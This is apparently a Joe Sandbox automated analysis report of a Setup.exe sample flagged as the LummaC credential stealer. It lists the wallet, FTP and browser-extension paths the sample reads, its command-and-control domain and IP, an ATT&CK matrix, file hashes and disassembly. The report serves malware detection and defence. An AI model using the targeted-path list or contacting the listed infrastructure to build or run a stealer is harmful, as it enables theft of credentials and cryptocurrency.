Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Setup.exe

File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7128, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	11%	ReversingLabs	Win32.Exploit.LummaC

Source	Detection	Scanner	Label
https://simplerapplau.click/	0%	Avira URL Cloud	safe
https://simplerapplau.click/apil	0%	Avira URL Cloud	safe
https://simplerapplau.click/CY/	0%	Avira URL Cloud	safe
https://simplerapplau.click/ur	0%	Avira URL Cloud	safe
https://simplerapplau.click:443/apiefault-release/key4.dbPK	0%	Avira URL Cloud	safe
https://simplerapplau.click/(w	0%	Avira URL Cloud	safe
https://simplerapplau.click/apicg	0%	Avira URL Cloud	safe
https://simplerapplau.click/apia	0%	Avira URL Cloud	safe
https://simplerapplau.click/otCW.	0%	Avira URL Cloud	safe
https://simplerapplau.cl	0%	Avira URL Cloud	safe
https://simplerapplau.click/apiiipp	0%	Avira URL Cloud	safe
https://simplerapplau.click/apihdmo	0%	Avira URL Cloud	safe
simplerapplau.click	0%	Avira URL Cloud	safe
https://simplerapplau.click/apiv	0%	Avira URL Cloud	safe
https://simplerapplau.click:443/api	0%	Avira URL Cloud	safe
https://simplerapplau.click/pi	0%	Avira URL Cloud	safe
https://simplerapplau.click/api	0%	Avira URL Cloud	safe
https://simplerapplau.click/f-cach	0%	Avira URL Cloud	safe
https://simplerapplau.click/api(	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
simplerapplau.click	104.21.88.199	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
aspecteirs.lat	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
https://simplerapplau.click/api	true	Avira URL Cloud: safe	unknown
simplerapplau.click	true	Avira URL Cloud: safe	unknown
energyaffai.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://simplerapplau.click/	Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simplerapplau.click/ur	Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.ini	Setup.exe	false		high
http://ocsp.sectigo.com0	Setup.exe	false		high
https://simplerapplau.click:443/apiefault-release/key4.dbPK	Setup.exe, 00000000.00000003.1888928350.000000000110E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891400964.0000000001110000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/specialoffer/latest_giveaway_addBuy	Setup.exe	false		high
https://simplerapplau.click/otCW.	Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simplerapplau.click/apicg	Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winxdvd.com/	Setup.exe	false		high
https://simplerapplau.click/CY/	Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcp_beginbeuiafterafuiopenUsing_Trial_CopyThis	Setup.exe	false		high
http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcpregisteropenRegistered_SuccessfullyRegistered	Setup.exe	false		high
http://www.winxdvd.com/dvd-copy-pro/free-update.htm?chlic13open	Setup.exe	false		high
http://x1.c.lencr.org/0	Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://simplerapplau.click/apil	Setup.exe, 00000000.00000003.1826294302.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winxdvd.com/specialoffer/old_giveaway_addBuy	Setup.exe	false		high
https://simplerapplau.click/(w	Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.iniupgrade.iniD=	Setup.exe	false		high
https://simplerapplau.cl	Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simplerapplau.click/apia	Setup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/dvd-copy-pro/registered-update.htmlatest_reg_addEnjoy	Setup.exe	false		high
http://www.winxdvd.com/dvd-copy-pro/buy.htmlatest_unreg_addBuy	Setup.exe	false		high
http://www.winxdvd.com/dvd-copy-pro/faq.htm1http://www.winxdvd.com/dvd-copy-pro/updatelog.htm9http:/	Setup.exe	false		high
https://sectigo.com/CPS0	Setup.exe	false		high
https://www.winxdvd.com/	Setup.exe	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/dvd-copy-pro/registered-update.htmThe	Setup.exe	false		high
https://simplerapplau.click/apiiipp	Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simplerapplau.click/apihdmo	Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winxdvd.com/dvd-copy-pro/registered-update.htmold_reg_addUpdate	Setup.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com	Setup.exe	false		high
https://www.ecosia.org/newtab/	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://simplerapplau.click/apiv	Setup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/dvd-copy-pro/registered-update.htm	Setup.exe	false		high
https://simplerapplau.click/pi	Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.winxdvd.com/Help_Filehelp.chm.chmhelpopenInit_CDROMCD-ROM	Setup.exe	false		high
https://ac.ecosia.org/autocomplete?q=	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Setup.exe	false		high
https://simplerapplau.click/api(	Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Setup.exe	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/dvd-copy-pro/free-update.htm	Setup.exe	false		high
http://www.winxdvd.com/dvd-copy-pro/buy.htmold_unreg_addBuy	Setup.exe	false		high
https://simplerapplau.click:443/api	Setup.exe, 00000000.00000003.1764468215.0000000001110000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winxdvd.com/dvd-copy-pro/download.htm7http://www.winxdvd.com/help/how-to-use-dvd-copy-pro	Setup.exe	false		high
https://simplerapplau.click/f-cach	Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micros	Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890224482.0000000001175000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.88.199	simplerapplau.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577781
Start date and time:	2024-12-18 18:28:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 6 Number of non-executed functions: 112
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Setup.exe

Simulations

Behavior and APIs

Time	Type	Description
13:45:53	API Interceptor	8x Sleep call for process: Setup.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://files.playanext.com/v8/avast_secure_browser_setup.exe	Get hash	malicious	Unknown	Browse	172.67.15.96
	https://docs.zoom.us/doc/amQMYMv8RzCj0FS5-u7_7w?from=email	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://johnlewisfinance.qa.uinsure.co.uk	Get hash	malicious	Unknown	Browse	1.1.1.1
	securedoc_20241217T163143.html	Get hash	malicious	Unknown	Browse	104.18.11.207
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc	Browse	104.21.23.76
	https://sites.google.com/kula.ai/rdps/home	Get hash	malicious	HTMLPhisher	Browse	104.21.56.29
	https://sites.google.com/kula.ai/rdps/home	Get hash	malicious	HTMLPhisher	Browse	172.67.134.110
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.65.255.143
	https://shorturl.at/roHta	Get hash	malicious	HTMLPhisher	Browse	104.26.8.129
	https://www.grapevine.org/join/next-gen-giving-circle-dc	Get hash	malicious	Unknown	Browse	104.16.117.116

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc	Browse	104.21.88.199
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	104.21.88.199
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	104.21.88.199
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	104.21.88.199
	0Vwp4nJQOc.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.88.199
	Lw1k8a7gQu.exe	Get hash	malicious	LummaC	Browse	104.21.88.199
	iOnDpwrkWY.exe	Get hash	malicious	LummaC	Browse	104.21.88.199
	Z1jUFmrTua.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.88.199
	greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta	Get hash	malicious	Cobalt Strike, Remcos, DBatLoader	Browse	104.21.88.199
	qth5kdee.exe	Get hash	malicious	LummaC	Browse	104.21.88.199

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.723780465993401
TrID:	Win32 Executable (generic) a (10002005/4) 98.99% InstallShield setup (43055/19) 0.43% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Setup.exe
File size:	10'190'992 bytes
MD5:	8af6db9955abed6390bc281e0430ddc3
SHA1:	fce22724af26d5242f04697c893166051d1dc797
SHA256:	150f955296353908a81bb4dca5c4a5b7563a057d5ed63f56831bee5234010e1c
SHA512:	8b5eba511893bd94b58e9494c264c581119e60900319b30b65c9743d322a732dc8f3dc4150431f84cd48d43f49aa5f187db5bee7ad8589d39369deeb6d9f96d1
SSDEEP:	98304:Rs3cmFA3kB7mHCGawTSEZUbWk/r3TqLjHT+da+FOwsMgJJTnQGGGGNlGGGSZGGGv:RccmpwybWCDTqnHT+zCvGBPC
TLSH:	BEA67C23F761C066F05709B0AA6B66B2AC346F74EA95004BB7A0BE0DB6F31D1516F707
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	bc0f370b1b0d4d43

Static PE Info

General

Entrypoint:	0x401e58
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x64D6E803 [Sat Aug 12 02:01:39 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	87254b6d506b71e6cf1f7cb33288bee2

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	18/05/2021 20:00:00 22/05/2024 19:59:59
Subject Chain	CN="Digiarty Software, Inc.", O="Digiarty Software, Inc.", L=Chengdu, S=Sichuan, C=CN
Version:	3
Thumbprint MD5:	E52449B6FB0D71581A2377613347EF76
Thumbprint SHA-1:	E122C1337C0DCAE9D48B776CCFD12A70C33F9CE8
Thumbprint SHA-256:	7E00A55AC7216D474B66FE6DBE66A7014631BA5693B10E5A829EA3CE59A77DAC
Serial:	01F30A8BB86816538B43BF89D74D9F48

Entrypoint Preview

Instruction
jmp 00007F75FD12F4A2h
bound di, dword ptr [edx]
inc ebx
sub ebp, dword ptr [ebx]
dec eax
dec edi
dec edi
dec ebx
nop
jmp 00007F75FDA58541h
mov eax, dword ptr [0092909Fh]
shl eax, 02h
mov dword ptr [009290A3h], eax
push edx
push 00000000h
call 00007F75FD65496Ch
mov edx, eax
call 00007F75FD43DE07h
pop edx
call 00007F75FD43DA01h
call 00007F75FD43E318h
push 00000000h
call 00007F75FD43F8F9h
pop ecx
push 00929048h
push 00000000h
call 00007F75FD654946h
mov dword ptr [009290A7h], eax
push 00000000h
jmp 00007F75FD44ACA0h
jmp 00007F75FD43F92Bh
xor eax, eax
mov al, byte ptr [00929091h]
ret
mov eax, dword ptr [009290A7h]
ret
pushad
mov ebx, BCB05000h
push ebx
push 00000BADh
ret
mov ecx, 000000ECh
or ecx, ecx
je 00007F75FD12F4DFh
cmp dword ptr [0092909Fh], 00000000h
jnc 00007F75FD12F49Ch
mov eax, 000000FEh
call 00007F75FD12F46Ch
mov ecx, 000000ECh
push ecx
push 00000008h
call 00007F75FD654909h
push eax
call 00007F75FD6549B1h
or eax, eax
jne 00007F75FD12F49Ch
mov eax, 000000FDh
call 00007F75FD12F44Bh
push eax
push eax
push dword ptr [0092909Fh]
call 00007F75FD44AE8Eh
push dword ptr [0092909Fh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5d8000	0x3ca81	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5d3000	0x3ee6	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x615000	0x326d9d	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x9b6000	0x2090	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x93c000	0x3d8ac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5d2000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x5d7000	0x330	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x528000	0x527200	c3f30f48e002611fddf54002d1e426ec	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x529000	0xa8000	0x9b000	aed38f10af5c7e8693192c03247507a4	False	0.21901619203629033	data	5.321502334831228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5d1000	0x1000	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5d2000	0x1000	0x200	fb6002e177d522f5a511dbf53764c45e	False	0.052734375	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\235"	0.20544562813451883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.idata	0x5d3000	0x4000	0x4000	2599b332d1249d8658e1aedfb860171e	False	0.30865478515625	data	5.068352762746394	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didata	0x5d7000	0x1000	0x400	d88f99ca61d5c5fbc1cc862ccddecac5	False	0.4130859375	data	3.6150461714575237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x5d8000	0x3d000	0x3cc00	96e7599509aceb99962b849b237a05f5	False	0.22938368055555555	data	5.853462489205014	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x615000	0x326d9d	0x326e00	684376849ff1e6a7d4e06554c6843b0a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
